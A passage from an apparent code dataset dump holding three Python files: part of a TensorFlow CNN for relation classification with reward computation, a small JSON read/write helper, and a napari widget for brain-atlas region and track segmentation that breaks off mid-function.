relation_embedding = tf.get_variable('relation_embedding', [self.num_classes, self.cnn_size])\n\n # placeholder和feed_dict绑定,使用placeholder是要在运行时再给tf一个输入的值\n # 使用feed_dict在Session.run()时提供输入值。\n self.input_word = tf.placeholder(dtype=tf.int32, shape=[None, len_sentence], name='input_word')\n self.input_pos1 = tf.placeholder(dtype=tf.int32, shape=[None, len_sentence], name='input_pos1')\n self.input_pos2 = tf.placeholder(dtype=tf.int32, shape=[None, len_sentence], name='input_pos2')\n self.input_y = tf.placeholder(dtype=tf.float32, shape=[None, num_classes], name='input_y')\n self.keep_prob = tf.placeholder(tf.float32)\n\n # 在word_embedding中找到input_word\n self.input_word_ebd = tf.nn.embedding_lookup(word_embedding, self.input_word)\n self.input_pos1_ebd = tf.nn.embedding_lookup(pos1_embedding, self.input_pos1)\n self.input_pos2_ebd = tf.nn.embedding_lookup(pos2_embedding, self.input_pos2)\n\n print(\"input_word_ebd: \", self.input_word_ebd)\n print(\"input_pos1_ebd: \", self.input_pos1_ebd)\n print(\"input_pos2_ebd: \", self.input_pos2_ebd)\n\n # 将values的列表沿维度“axis”连接起来。\n self.inputs = tf.concat(axis=2, values=[self.input_word_ebd, self.input_pos1_ebd, self.input_pos2_ebd])\n\n print(\"inputs: \", self.inputs)\n\n self.inputs = tf.reshape(self.inputs, [-1, self.len_sentence, self.word_embedding + self.pos_size * 2, 1])\n\n print(\"inputs: \", self.inputs)\n\n '''\n 卷积层\n input:张量,必须是 half、float32、float64 三种类型之一。\n kernel_size: 一个整数,或者包含了两个整数的元组/队列,表示卷积窗的高和宽。\n strides:整数列表。长度是 4 的一维向量。输入的每一维度的滑动窗口步幅。必须与指定格式维度的顺序相同。\n padding:可选字符串为 SAME、VALID。要使用的填充算法的类型。卷积方式\n '''\n self.conv = layers.conv2d(inputs=self.inputs, num_outputs=self.cnn_size, kernel_size=[3, 60], stride=[1, 60],\n padding='SAME')\n print(\"conv: \", self.conv)\n '''\n 最大池化\n kernel_size:长度 >=4 的整数列表。输入张量的每个维度的窗口大小。\n strides:长度 >=4 的整数列表。输入张量的每个维度的滑动窗口的步幅。\n '''\n self.max_pool = layers.max_pool2d(self.conv, kernel_size=[70, 1], stride=[1, 1])\n\n print(\"max_pool: \",self.max_pool)\n # 全连接层\n # 将最大池化后的数据转换结构[[0~cnn_size],[0~cnn_size]]\n self.sentence = tf.reshape(self.max_pool, [-1, self.cnn_size])\n\n print(\"sentence: \", self.sentence)\n # 计算sentence的双曲正切,一般和dropout连用\n self.tanh = tf.nn.tanh(self.sentence)\n # tensorflow里面为了防止或减轻过拟合而使用的函数,它一般用在全连接层\n self.drop = layers.dropout(self.tanh, keep_prob=self.keep_prob)\n\n\n # 添加一个完全连接的层。返回运算结果\n self.outputs = layers.fully_connected(inputs=self.drop, num_outputs=self.num_classes, activation_fn=tf.nn.softmax)\n\n print(\"outputs: \", self.outputs)\n print(\"input_y: \", self.input_y)\n\n '''\n self.y_index = tf.argmax(self.input_y,1,output_type=tf.int32)\n self.indexes = tf.range(0, tf.shape(self.outputs)[0]) * tf.shape(self.outputs)[1] + self.y_index\n self.responsible_outputs = - tf.reduce_mean(tf.log(tf.gather(tf.reshape(self.outputs, [-1]),self.indexes)))\n '''\n # loss 损失函数\n # self.cross_loss = -tf.reduce_mean( tf.log(tf.reduce_sum( self.input_y * self.outputs ,axis=1)))\n\n\n # 交叉损失\n self.cross_loss = -tf.reduce_mean(tf.reduce_sum(self.input_y * tf.log(self.outputs), axis=1))\n self.cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(\n logits=self.outputs, labels=self.input_y\n ))\n # 奖励\n self.reward = tf.log(tf.reduce_sum(self.input_y * self.outputs, axis=1))\n\n self.l2_loss = tf.contrib.layers.apply_regularization(regularizer=tf.contrib.layers.l2_regularizer(0.0001),\n weights_list=tf.trainable_variables())\n\n self.final_loss = self.cross_loss + self.l2_loss\n\n # accuracy\n # arg_max 返回一维张量中最大的值所在的位置\n self.pred = tf.argmax(self.outputs, axis=1)\n self.pred_prob = tf.reduce_max(self.outputs, axis=1)\n\n self.y_label = tf.argmax(self.input_y, axis=1)\n # 先比较pred和y_label,结果存放在一个布尔型列表中\n # 将结果转换为float类型\n # 计算所有float类型结果的平均值\n self.accuracy = tf.reduce_mean(tf.cast(tf.equal(self.pred, self.y_label), 'float'))\n\n # minimize loss\n # 使用Adam算法最小化损失\n optimizer = tf.train.AdamOptimizer(self.lr)\n self.train_op = optimizer.minimize(self.final_loss)\n\n # 返回所有用' trainable=True '创建的变量。\n self.tvars = tf.trainable_variables()\n\n # manual update parameters 将tvars中的value值转换为index_holder\n # 先将tvars中的数据,转换为一个placeholder,内容为 index_holder,并添加到tvars_holders中\n self.tvars_holders = []\n for idx, var in enumerate(self.tvars):\n placeholder = tf.placeholder(tf.float32, name=str(idx) + '_holder')\n self.tvars_holders.append(placeholder)\n\n # 枚举tvars将value赋值为tvars_holders的值,添加到update_tvar_holder中\n self.update_tvar_holder = []\n for idx, var in enumerate(self.tvars):\n update_tvar = tf.assign(var, self.tvars_holders[idx])\n self.update_tvar_holder.append(update_tvar)\n\n\ndef train(path_train_word, path_train_pos1, path_train_pos2, path_train_y, save_path):\n print('reading wordembedding')\n # 加载词向量嵌入\n wordembedding = np.load('./data/vec.npy', allow_pickle=True)\n\n print('reading training data')\n\n cnn_train_word = np.load(path_train_word)\n cnn_train_pos1 = np.load(path_train_pos1)\n cnn_train_pos2 = np.load(path_train_pos2)\n cnn_train_y = np.load(path_train_y)\n\n settings = Settings()\n settings.vocab_size = len(wordembedding)\n settings.num_classes = len(cnn_train_y[0])\n settings.num_steps = len(cnn_train_word) // settings.batch_size\n\n with tf.Graph().as_default():\n sess = tf.Session()\n with sess.as_default():\n\n # 实现权重的初始化\n initializer = tf.contrib.layers.xavier_initializer()\n with tf.variable_scope(\"model\", reuse=None, initializer=initializer):\n model = CNN(word_embeddings=wordembedding, setting=settings)\n\n # 运行tf并初始化所有的变量\n sess.run(tf.global_variables_initializer())\n # 构造函数用于保存和恢复变量,也可以用于保存model\n # saver = tf.train.Saver()\n # saver.restore(sess,save_path=save_path)\n for epoch in range(1, settings.num_epochs + 1):\n\n # 进度条\n bar = tqdm(range(settings.num_steps), desc='epoch {}, loss=0.000000, accuracy=0.000000'.format(epoch))\n\n for _ in bar:\n # 在cnn_train_y中随机选择batch_size个唯一随机元素。\n sample_list = random.sample(range(len(cnn_train_y)), settings.batch_size)\n # 同理\n batch_train_word = [cnn_train_word[x] for x in sample_list]\n batch_train_pos1 = [cnn_train_pos1[x] for x in sample_list]\n batch_train_pos2 = [cnn_train_pos2[x] for x in sample_list]\n batch_train_y = [cnn_train_y[x] for x in sample_list]\n\n # 将训练数据添加到feed_dict中\n feed_dict = {}\n feed_dict[model.input_word] = batch_train_word\n feed_dict[model.input_pos1] = batch_train_pos1\n feed_dict[model.input_pos2] = batch_train_pos2\n feed_dict[model.input_y] = batch_train_y\n feed_dict[model.keep_prob] = settings.keep_prob\n\n # 训练数据。\n _, loss, cross_loss, cost, accuracy = sess.run([model.train_op, model.final_loss, model.cross_loss, model.cost, model.accuracy],\n feed_dict=feed_dict)\n\n conv = sess.run(model.conv, feed_dict=feed_dict)\n max_pool = sess.run(model.max_pool, feed_dict=feed_dict)\n sentence = sess.run(model.sentence, feed_dict=feed_dict)\n tanh = sess.run(model.tanh, feed_dict=feed_dict)\n drop = sess.run(model.drop, feed_dict=feed_dict)\n outputs = sess.run(model.outputs, feed_dict=feed_dict)\n pred = sess.run(model.pred, feed_dict=feed_dict)\n y_label = sess.run(model.y_label, feed_dict=feed_dict)\n\n # print(\"conv: \", conv[0])\n # print(\"max_pool: \", max_pool[0])\n print(\"sentence[0]: \", sentence[0])\n print(\"sentence: \", sentence)\n # print(\"tanh: \", tanh[0])\n # print(\"drop: \", drop[0])\n # print(\"outputs: \", outputs)\n # print(\"pred: \", pred)\n # print(\"y_label: \", y_label)\n\n\n bar.set_description('epoch {} loss={:.6f} accuracy={:.6f}'.format(epoch, loss, accuracy))\n # print('epoch {} cross_loss={:.6f} cost={:.6f}'.format(epoch, cross_loss, cost))\n # break\n # 训练完保存sess\n # saver.save(sess, save_path=save_path)\n # break\n\n\nclass interaction():\n\n def __init__(self, sess, save_path='model/model.ckpt3'):\n\n self.settings = Settings()\n wordembedding = np.load('./data/vec.npy', allow_pickle=True)\n\n self.sess = sess\n with tf.variable_scope(\"model\"):\n self.model = CNN(word_embeddings=wordembedding, setting=self.settings)\n\n self.saver = tf.train.Saver()\n self.saver.restore(self.sess, save_path)\n\n self.train_word = np.load('./data/train_word.npy', allow_pickle=True)\n self.train_pos1 = np.load('./data/train_pos1.npy', allow_pickle=True)\n self.train_pos2 = np.load('./data/train_pos2.npy', allow_pickle=True)\n self.y_train = np.load('data/train_y.npy', allow_pickle=True)\n\n # 测试数据\n self.testall_word = np.load('./data/testall_word.npy', allow_pickle=True)\n self.testall_pos1 = np.load('./data/testall_pos1.npy', allow_pickle=True)\n self.testall_pos2 = np.load('./data/testall_pos2.npy', allow_pickle=True)\n\n # 计算奖励\n def reward(self, batch_test_word, batch_test_pos1, batch_test_pos2, batch_test_y):\n\n feed_dict = {}\n feed_dict[self.model.input_word] = batch_test_word\n feed_dict[self.model.input_pos1] = batch_test_pos1\n feed_dict[self.model.input_pos2] = batch_test_pos2\n feed_dict[self.model.input_y] = batch_test_y\n feed_dict[self.model.keep_prob] = 1\n outputs = (self.sess.run(self.model.reward, feed_dict=feed_dict))\n return (outputs)\n\n # 计算句子的向量嵌入\n def sentence_ebd(self, batch_test_word, batch_test_pos1, batch_test_pos2, batch_test_y):\n feed_dict = {}\n feed_dict[self.model.input_word] = batch_test_word\n feed_dict[self.model.input_pos1] = batch_test_pos1\n feed_dict[self.model.input_pos2] = batch_test_pos2\n feed_dict[self.model.input_y] = batch_test_y\n feed_dict[self.model.keep_prob] = 1\n outputs = self.sess.run(self.model.sentence, feed_dict=feed_dict)\n return (outputs)\n\n # 计算准确率\n def test(self, batch_test_word, batch_test_pos1, batch_test_pos2):\n feed_dict = {}\n feed_dict[self.model.input_word] = batch_test_word\n feed_dict[self.model.input_pos1] = batch_test_pos1\n feed_dict[self.model.input_pos2] = batch_test_pos2\n feed_dict[self.model.keep_prob] = 1\n relation, prob = self.sess.run([self.model.pred, self.model.pred_prob], feed_dict=feed_dict)\n\n return (relation, prob)\n\n def update_cnn(self, update_word, update_pos1, update_pos2, update_y, updaterate):\n\n num_steps = len(update_word) // self.settings.batch_size\n\n with self.sess.as_default():\n\n tvars_old = self.sess.run(self.model.tvars)\n\n for i in tqdm(range(num_steps)):\n batch_word = update_word[i * self.settings.batch_size:(i + 1) * self.settings.batch_size]\n batch_pos1 = update_pos1[i * self.settings.batch_size:(i + 1) * self.settings.batch_size]\n batch_pos2 = update_pos2[i * self.settings.batch_size:(i + 1) * self.settings.batch_size]\n batch_y = update_y[i * self.settings.batch_size:(i + 1) * self.settings.batch_size]\n\n feed_dict = {}\n feed_dict[self.model.input_word] = batch_word\n feed_dict[self.model.input_pos1] = batch_pos1\n feed_dict[self.model.input_pos2] = batch_pos2\n feed_dict[self.model.input_y] = batch_y\n feed_dict[self.model.keep_prob] = self.settings.keep_prob\n # _, loss, accuracy = sess.run([self.model.train_op,self.model.final_loss, self.model.accuracy], feed_dict=feed_dict)\n self.sess.run(self.model.train_op, feed_dict=feed_dict)\n\n # get tvars_new\n tvars_new = self.sess.run(self.model.tvars)\n\n # update old variables of the target network\n tvars_update = self.sess.run(self.model.tvars)\n for index, var in enumerate(tvars_update):\n tvars_update[index] = updaterate * tvars_new[index] + (1 - updaterate) * tvars_old[index]\n\n feed_dict = dictionary = dict(zip(self.model.tvars_holders, tvars_update))\n self.sess.run(self.model.update_tvar_holder, feed_dict)\n\n # 计算每个关系的准确率\n def produce_ac(self):\n\n testall_word = self.testall_word\n testall_pos1 = self.testall_pos1\n testall_pos2 = self.testall_pos2\n dict_ac={}\n len_batch = len(testall_word)\n\n with self.sess.as_default():\n for batch in tqdm(range(len_batch)):\n batch_word = testall_word[batch]\n batch_pos1 = testall_pos1[batch]\n batch_pos2 = testall_pos2[batch]\n\n (tmp_relation, tmp_prob) = self.test(batch_word, batch_pos1, batch_pos2)\n tmp_prob=list(tmp_prob)\n tmp_relation=list(tmp_relation)\n dict_ac.setdefault(tmp_relation[0],[]).append(tmp_prob[0])\n\n for k,v in dict_ac.items():\n dict_ac[k]=np.mean(np.array(v))\n\n return dict_ac\n\n def produce_new_embedding(self):\n\n # produce reward sentence_ebd average_reward\n train_word = self.train_word\n train_pos1 = self.train_pos1\n train_pos2 = self.train_pos2\n y_train = self.y_train\n all_sentence_ebd = []\n all_reward = []\n all_reward_list = []\n len_batch = len(train_word)\n\n with self.sess.as_default():\n for batch in tqdm(range(len_batch)):\n batch_word = train_word[batch]\n batch_pos1 = train_pos1[batch]\n batch_pos2 = train_pos2[batch]\n # batch_y = train_y[batch]\n batch_y = [y_train[batch] for x in range(len(batch_word))]\n\n tmp_sentence_ebd = self.sentence_ebd(batch_word, batch_pos1, batch_pos2, batch_y)\n tmp_reward = self.reward(batch_word, batch_pos1, batch_pos2, batch_y)\n\n all_sentence_ebd.append(tmp_sentence_ebd)\n all_reward.append(tmp_reward)\n all_reward_list += list(tmp_reward)\n\n all_reward_list = np.array(all_reward_list)\n average_reward = np.mean(all_reward_list)\n average_reward = np.array(average_reward)\n\n all_sentence_ebd = np.array(all_sentence_ebd)\n all_reward = np.array(all_reward)\n\n return average_reward, all_sentence_ebd, all_reward\n\n def save_cnnmodel(self, save_path):\n with self.sess.as_default():\n self.saver.save(self.sess, save_path=save_path)\n\n def tvars(self):\n with self.sess.as_default():\n tvars = self.sess.run(self.model.tvars)\n return tvars\n\n def update_tvars(self, tvars_update):\n with self.sess.as_default():\n feed_dict = dictionary = dict(zip(self.model.tvars_holders, tvars_update))\n self.sess.run(self.model.update_tvar_holder, feed_dict)\n\n\n# produce reward sentence_ebd average_reward\ndef produce_rldata(save_path):\n with tf.Graph().as_default():\n sess = tf.Session()\n with sess.as_default():\n # start = time.time()\n interact = interaction(sess, save_path)\n average_reward, all_sentence_ebd, all_reward = interact.produce_new_embedding()\n\n dict_ac = interact.produce_ac()\n\n np.save('data/average_reward.npy', average_reward)\n np.save('data/all_sentence_ebd.npy', all_sentence_ebd)\n np.save('data/all_reward.npy', all_reward)\n\n print(average_reward)\n print(dict_ac)\n\n\nif __name__ == '__main__':\n # train model\n print('train model')\n train('cnndata/cnn_train_word.npy', 'cnndata/cnn_train_pos1.npy', 'cnndata/cnn_train_pos2.npy',\n 'cnndata/cnn_train_y.npy', 'model/origin_cnn_model.ckpt')\n\n # produce reward sentence_ebd average_reward for rlmodel\n print('produce reward sentence_ebd average_reward for rlmodel')\n # produce_rldata(save_path='model/origin_cnn_model.ckpt')\n\n\n\n\n\n","sub_path":"cnnmodel.py","file_name":"cnnmodel.py","file_ext":"py","file_size_in_byte":19813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"96678384","text":"import json\nfrom conf import setting\nfrom common.logger import log\n\n\ndef readJson(filepath):\n '''获取json数据'''\n try:\n with open(filepath,'r') as f :\n data = json.load(f) #loads需要f.read()\n return data\n except Exception as e:\n log.error(e)\n\ndef writeJson(filepath,data):\n try:\n with open(filepath, 'w') as f:\n f.seek(0) # 因为是追加方式打开,默认偏移量再最后面,调整到开头\n dta = json.dumps(data)\n f.write(dta)\n except Exception as e:\n log.error(\"写入JSON前打开文件失败!\")","sub_path":"hsq_InterfaceTest/common/operationJson.py","file_name":"operationJson.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"312047842","text":"import napari\nimport numpy as np\nfrom pathlib import Path\nfrom napari.qt.threading import thread_worker\nfrom qtpy import QtCore\n\nfrom qtpy.QtWidgets import (\n QLabel,\n QFileDialog,\n QGridLayout,\n QGroupBox,\n QWidget,\n)\n\nfrom bg_atlasapi import BrainGlobeAtlas\n\nfrom brainreg_segment.paths import Paths\n\nfrom brainreg_segment.regions.IO import (\n save_label_layers,\n export_label_layers,\n)\n\nfrom brainreg_segment.tracks.IO import save_track_layers, export_splines\n\nfrom brainreg_segment.atlas.utils import (\n get_available_atlases,\n structure_from_viewer,\n)\nfrom brainreg_segment.layout.utils import display_warning\n\n# LAYOUT HELPERS ################################################################################\n\n# from brainreg_segment.layout.utils import (\n# disable_napari_key_bindings,\n# disable_napari_btns,\n# overwrite_napari_roll,\n# )\nfrom brainreg_segment.layout.gui_constants import (\n WINDOW_HEIGHT,\n WINDOW_WIDTH,\n COLUMN_WIDTH,\n SEGM_METHODS_PANEL_ALIGN,\n LOADING_PANEL_ALIGN,\n BOUNDARIES_STRING,\n TRACK_FILE_EXT,\n DISPLAY_REGION_INFO,\n)\n\nfrom brainreg_segment.layout.gui_elements import (\n add_button,\n add_combobox,\n)\n\n# SEGMENTATION ################################################################################\nfrom brainreg_segment.segmentation_panels.regions import RegionSeg\nfrom brainreg_segment.segmentation_panels.tracks import TrackSeg\n\n\nclass SegmentationWidget(QWidget):\n def __init__(\n self,\n viewer: napari.viewer.Viewer,\n boundaries_string=BOUNDARIES_STRING,\n ):\n super(SegmentationWidget, self).__init__()\n\n # general variables\n self.viewer = viewer\n\n # Disable / overwrite napari viewer functions\n # that either do not make sense or should be avoided by the user\n # removed for now, to make sure plugin\n # disable_napari_btns(self.viewer)\n # disable_napari_key_bindings()\n # overwrite_napari_roll(self.viewer)\n\n # Main layers\n self.base_layer = [] # Contains registered brain / reference brain\n self.atlas_layer = [] # Contains annotations / region information\n\n # Other data\n self.hemispheres_data = []\n\n # Track variables\n self.track_layers = []\n\n # Region variables\n self.label_layers = []\n\n # Atlas variables\n self.current_atlas_name = \"\"\n self.atlas = None\n\n self.boundaries_string = boundaries_string\n self.directory = \"\"\n # Set up segmentation methods\n self.region_seg = RegionSeg(self)\n self.track_seg = TrackSeg(self)\n\n # Generate main layout\n self.setup_main_layout()\n\n if DISPLAY_REGION_INFO:\n\n @self.viewer.mouse_move_callbacks.append\n def display_region_info(v, event):\n \"\"\"\n Show brain region info on mouse over in status bar on the right\n \"\"\"\n assert self.viewer == v\n if v.dims.ndisplay == 2:\n if len(v.layers) and self.atlas_layer and self.atlas:\n _, _, _, region_info = structure_from_viewer(\n self.viewer.status, self.atlas_layer, self.atlas\n )\n self.viewer.help = region_info\n else:\n self.viewer.help = \"\"\n\n def setup_main_layout(self):\n \"\"\"\n Construct main layout of widget\n \"\"\"\n self.layout = QGridLayout()\n self.layout.setContentsMargins(10, 10, 10, 10)\n self.layout.setAlignment(QtCore.Qt.AlignTop)\n self.layout.setSpacing(4)\n\n # 3 Steps:\n # - Loading panel\n # - Segmentation methods panel\n # -> Individual segmentation methods (which are invisible at first)\n # - Saving panel\n\n self.add_loading_panel(1)\n self.add_segmentation_methods_panel(1)\n self.track_seg.add_track_panel(2) # Track segmentation subpanel\n self.region_seg.add_region_panel(3) # Region segmentation subpanel\n self.add_saving_panel(4)\n\n # Take care of status label\n self.status_label = QLabel()\n self.status_label.setText(\"Ready\")\n self.layout.addWidget(self.status_label, 5, 0)\n\n self.setLayout(self.layout)\n\n # PANELS ###############################################################\n\n def add_segmentation_methods_panel(self, row, column=1):\n \"\"\"\n Segmentation methods chooser panel:\n Toggle visibility of segmentation\n methods\n \"\"\"\n self.toggle_methods_panel = QGroupBox(\"Segmentation\")\n self.toggle_methods_layout = QGridLayout()\n self.toggle_methods_layout.setContentsMargins(10, 10, 10, 10)\n self.toggle_methods_layout.setSpacing(5)\n self.toggle_methods_layout.setAlignment(QtCore.Qt.AlignBottom)\n\n self.show_trackseg_button = add_button(\n \"Track tracing\",\n self.toggle_methods_layout,\n self.track_seg.toggle_track_panel,\n 0,\n 1,\n minimum_width=COLUMN_WIDTH,\n alignment=SEGM_METHODS_PANEL_ALIGN,\n )\n self.show_trackseg_button.setEnabled(False)\n\n self.show_regionseg_button = add_button(\n \"Region segmentation\",\n self.toggle_methods_layout,\n self.region_seg.toggle_region_panel,\n 1,\n 1,\n minimum_width=COLUMN_WIDTH,\n alignment=SEGM_METHODS_PANEL_ALIGN,\n )\n self.show_regionseg_button.setEnabled(False)\n\n self.toggle_methods_layout.setColumnMinimumWidth(1, COLUMN_WIDTH)\n self.toggle_methods_panel.setLayout(self.toggle_methods_layout)\n self.toggle_methods_panel.setVisible(True)\n\n self.layout.addWidget(self.toggle_methods_panel, row, column, 1, 1)\n\n def add_loading_panel(self, row, column=0):\n \"\"\"\n Loading panel:\n - Load project (sample space)\n - Load project (atlas space)\n - Atlas chooser\n \"\"\"\n self.load_data_panel = QGroupBox(\"Load data\")\n self.load_data_layout = QGridLayout()\n self.load_data_layout.setSpacing(15)\n self.load_data_layout.setContentsMargins(10, 10, 10, 10)\n self.load_data_layout.setAlignment(QtCore.Qt.AlignBottom)\n\n self.load_button = add_button(\n \"Load project (sample space)\",\n self.load_data_layout,\n self.load_brainreg_directory_sample,\n 0,\n 0,\n visibility=False,\n minimum_width=COLUMN_WIDTH,\n alignment=LOADING_PANEL_ALIGN,\n )\n\n self.load_button_standard = add_button(\n \"Load project (atlas space)\",\n self.load_data_layout,\n self.load_brainreg_directory_standard,\n 1,\n 0,\n visibility=False,\n minimum_width=COLUMN_WIDTH,\n alignment=LOADING_PANEL_ALIGN,\n )\n\n self.add_atlas_menu(self.load_data_layout)\n\n self.load_data_layout.setColumnMinimumWidth(0, COLUMN_WIDTH)\n self.load_data_panel.setLayout(self.load_data_layout)\n self.load_data_panel.setVisible(True)\n\n self.layout.addWidget(self.load_data_panel, row, column, 1, 1)\n\n # buttons made visible after adding to main widget, preventing them\n # from briefly appearing in a separate window\n self.load_button.setVisible(True)\n self.load_button_standard.setVisible(True)\n\n def add_saving_panel(self, row):\n \"\"\"\n Saving/Export panel\n \"\"\"\n self.save_data_panel = QGroupBox()\n self.save_data_layout = QGridLayout()\n\n self.export_button = add_button(\n \"To brainrender\",\n self.save_data_layout,\n self.export_to_brainrender,\n 0,\n 0,\n visibility=False,\n )\n self.save_button = add_button(\n \"Save\", self.save_data_layout, self.save, 0, 1, visibility=False\n )\n\n self.save_data_layout.setColumnMinimumWidth(1, COLUMN_WIDTH)\n self.save_data_panel.setLayout(self.save_data_layout)\n self.layout.addWidget(self.save_data_panel, row, 0, 1, 2)\n\n self.save_data_panel.setVisible(False)\n\n # ATLAS INTERACTION ####################################################\n\n def add_atlas_menu(self, layout):\n list_of_atlasses = [\"Load atlas\"]\n available_atlases = get_available_atlases()\n for atlas in available_atlases.keys():\n atlas_desc = f\"{atlas} v{available_atlases[atlas]}\"\n list_of_atlasses.append(atlas_desc)\n atlas_menu, _ = add_combobox(\n layout,\n None,\n list_of_atlasses,\n 2,\n 0,\n label_stack=True,\n callback=self.initialise_atlas,\n width=COLUMN_WIDTH,\n )\n\n self.atlas_menu = atlas_menu\n\n def initialise_atlas(self):\n atlas_string = self.atlas_menu.currentText()\n atlas_name = atlas_string.split(\" \")[0].strip()\n if atlas_name != self.current_atlas_name:\n status = self.remove_layers()\n if not status: # Something prevented deletion\n self.reset_atlas_menu()\n return\n else:\n print(f\"{atlas_string} already selected for segmentation.\")\n self.reset_atlas_menu()\n return\n\n # Get / set output directory\n self.set_output_directory()\n if not self.directory:\n self.reset_atlas_menu()\n return\n\n self.current_atlas_name = atlas_name\n # Instantiate atlas layers\n self.load_atlas()\n\n self.directory = self.directory / atlas_name\n self.paths = Paths(self.directory, atlas_space=True)\n\n self.status_label.setText(\"Ready\")\n # Set window title\n # self.viewer.title = f\"Atlas: {self.current_atlas_name}\"\n self.initialise_segmentation_interface()\n # Check / load previous regions and tracks\n self.region_seg.check_saved_region()\n self.track_seg.check_saved_track()\n self.reset_atlas_menu()\n\n def set_output_directory(self):\n self.status_label.setText(\"Loading...\")\n options = QFileDialog.Options()\n options |= QFileDialog.DontUseNativeDialog\n self.directory = QFileDialog.getExistingDirectory(\n self,\n \"Select output directory\",\n options=options,\n )\n if self.directory != \"\":\n self.directory = Path(self.directory)\n\n def load_atlas(self):\n atlas = BrainGlobeAtlas(self.current_atlas_name)\n self.atlas = atlas\n self.base_layer = self.viewer.add_image(\n self.atlas.reference,\n name=\"Reference\",\n )\n self.atlas_layer = self.viewer.add_labels(\n self.atlas.annotation,\n name=self.atlas.atlas_name,\n blending=\"additive\",\n opacity=0.3,\n visible=False,\n )\n self.standard_space = True\n\n def reset_atlas_menu(self):\n # Reset menu for atlas - show initial description\n self.atlas_menu.blockSignals(True)\n self.atlas_menu.setCurrentIndex(0)\n self.atlas_menu.blockSignals(False)\n\n # BRAINREG INTERACTION #################################################\n\n def load_brainreg_directory_sample(self):\n self.get_brainreg_directory(standard_space=False)\n\n def load_brainreg_directory_standard(self):\n self.get_brainreg_directory(standard_space=True)\n\n def get_brainreg_directory(self, standard_space):\n \"\"\"\n Shows file dialog to choose output directory\n and sets global directory info\n \"\"\"\n if standard_space:\n self.plugin = \"brainreg-standard\"\n self.standard_space = True\n else:\n self.plugin = \"brainglobe-io\"\n self.standard_space = False\n\n self.status_label.setText(\"Loading...\")\n options = QFileDialog.Options()\n options |= QFileDialog.DontUseNativeDialog\n brainreg_directory = QFileDialog.getExistingDirectory(\n self,\n \"Select brainreg directory\",\n options=options,\n )\n\n if not brainreg_directory:\n return\n\n if self.directory != brainreg_directory:\n status = self.remove_layers()\n if not status:\n return # Something prevented deletion\n self.directory = Path(brainreg_directory)\n else:\n print(f\"{str(brainreg_directory)} already loaded.\")\n return\n\n # Otherwise, proceed loading brainreg dir\n self.load_brainreg_directory()\n\n def load_brainreg_directory(self):\n \"\"\"\n Opens brainreg folder in napari.\n Calls initialise_loaded_data to set up layers / info.\n Then checks for previously loaded data.\n\n \"\"\"\n try:\n self.viewer.open(str(self.directory), plugin=self.plugin)\n self.paths = Paths(\n self.directory,\n standard_space=self.standard_space,\n )\n self.initialise_loaded_data()\n except ValueError:\n print(\n f\"The directory ({self.directory}) does not appear to be \"\n f\"a brainreg directory, please try again.\"\n )\n return\n\n # Check / load previous regions and tracks\n self.region_seg.check_saved_region()\n self.track_seg.check_saved_track()\n\n def initialise_loaded_data(self):\n \"\"\"\n Set up brainreg layers in napari / fill with new data and info\n\n \"\"\"\n try:\n self.viewer.layers.remove(self.boundaries_string)\n except ValueError:\n pass\n\n self.base_layer = self.viewer.layers[\"Registered image\"]\n self.metadata = self.base_layer.metadata\n self.atlas = self.metadata[\"atlas_class\"]\n self.atlas_layer = self.viewer.layers[self.metadata[\"atlas\"]]\n if self.standard_space:\n self.hemispheres_data = self.atlas.hemispheres\n else:\n self.hemispheres_data = self.viewer.layers[\"Hemispheres\"].data\n\n self.initialise_segmentation_interface()\n\n # Set window title\n # self.viewer.title = (\n # f\"Brainreg: {self.metadata['atlas']} ({self.plugin})\"\n # )\n self.status_label.setText(\"Ready\")\n\n # MORE LAYOUT COMPONENTS ###########################################\n\n def initialise_segmentation_interface(self):\n self.reset_variables()\n self.initialise_image_view()\n self.save_data_panel.setVisible(True)\n self.save_button.setVisible(True)\n self.export_button.setVisible(self.standard_space)\n self.show_regionseg_button.setEnabled(True)\n self.show_trackseg_button.setEnabled(True)\n self.status_label.setText(\"Ready\")\n\n def initialise_image_view(self):\n self.set_z_position()\n\n def set_z_position(self):\n midpoint = int(round(len(self.base_layer.data) / 2))\n self.viewer.dims.set_point(0, midpoint)\n\n def reset_variables(self):\n \"\"\"\n Reset atlas scale dependent variables\n - point_size (Track segmentation)\n - spline_size (Track segmentation)\n - brush_size (Region segmentation)\n \"\"\"\n self.mean_voxel_size = int(\n np.sum(self.atlas.resolution) / len(self.atlas.resolution)\n )\n self.track_seg.point_size = (\n self.track_seg.point_size_default / self.mean_voxel_size\n )\n self.track_seg.spline_size = (\n self.track_seg.spline_size_default / self.mean_voxel_size\n )\n self.region_seg.brush_size = (\n self.region_seg.brush_size_default / self.mean_voxel_size\n )\n return\n\n def remove_layers(self):\n \"\"\"\n TODO: This needs work. Runs into an error currently\n when switching from a annotated project to another one\n \"\"\"\n if len(self.viewer.layers) != 0:\n # Check with user if that is really what is wanted\n if self.track_layers or self.label_layers:\n choice = display_warning(\n self,\n \"About to remove layers\",\n \"All layers are about to be deleted. Proceed?\",\n )\n if not choice:\n print('Preventing deletion because user chose \"Cancel\"')\n return False\n\n # Remove old layers\n for layer in list(self.viewer.layers):\n try:\n self.viewer.layers.remove(layer)\n except IndexError: # no idea why this happens\n pass\n\n # There seems to be a napari bug trying to access previously used slider\n # values. Trying to circument for now\n self.viewer.window.qt_viewer.dims._last_used = None\n\n self.track_layers = []\n self.label_layers = []\n return True\n\n def save(self):\n if self.label_layers or self.track_layers:\n choice = display_warning(\n self,\n \"About to save files\",\n \"Existing files will be will be deleted. Proceed?\",\n )\n if choice:\n print(\"Saving\")\n worker = save_all(\n self.paths.regions_directory,\n self.paths.tracks_directory,\n self.label_layers,\n self.track_layers,\n track_file_extension=TRACK_FILE_EXT,\n )\n worker.start()\n else:\n print('Not saving because user chose \"Cancel\" \\n')\n\n def export_to_brainrender(self):\n choice = display_warning(\n self,\n \"About to export files\",\n \"Existing files will be will be deleted. Proceed?\",\n )\n if choice:\n print(\"Exporting\")\n worker = export_all(\n self.paths.regions_directory,\n self.paths.tracks_directory,\n self.label_layers,\n self.track_seg.splines,\n self.track_seg.spline_names,\n self.atlas.resolution[0],\n )\n worker.start()\n else:\n print('Not exporting because user chose \"Cancel\" \\n')\n\n\n@thread_worker\ndef export_all(\n regions_directory,\n tracks_directory,\n label_layers,\n splines,\n spline_names,\n resolution,\n):\n if label_layers:\n 